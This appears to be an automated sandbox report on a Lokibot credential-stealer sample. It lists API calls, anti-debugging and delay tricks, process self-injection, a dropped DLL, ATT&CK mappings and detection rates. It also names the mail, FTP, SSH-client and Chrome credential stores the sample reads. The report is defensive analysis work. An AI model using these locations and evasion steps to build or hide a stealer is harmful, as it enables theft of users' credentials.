              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_00402AC0 push eax; ret 2_1_00402AD4
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_00402AC0 push eax; ret 2_1_00402AFC
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405C49
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile created: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dllJump to dropped file
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exe TID: 5604Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405250
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,0_2_00405C22
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_1_00403D74
              Source: C:\Users\user\Desktop\U001P56ybm.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10010C55 IsDebuggerPresent,0_2_10010C55
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10013280 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_10013280
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405C49
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,0_2_10001000
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_0040317B mov eax, dword ptr fs:[00000030h]2_1_0040317B
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000EE31 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000EE31

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeMemory written: C:\Users\user\Desktop\U001P56ybm.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe" Jump to behavior
              Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10010E55 cpuid 0_2_10010E55
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_0040594D
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00406069 GetUserNameW,2_2_00406069

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)Show sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: PopPassword2_2_0040D069
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: SmtpPassword2_2_0040D069
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: PopPassword2_1_0040D069
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: SmtpPassword2_1_0040D069
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerSystem Information Discovery15SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSecurity Software Discovery13Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol111SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              U001P56ybm.exe25%ReversingLabsWin32.Trojan.Nsisx

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll23%ReversingLabsWin32.Trojan.Tedy

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
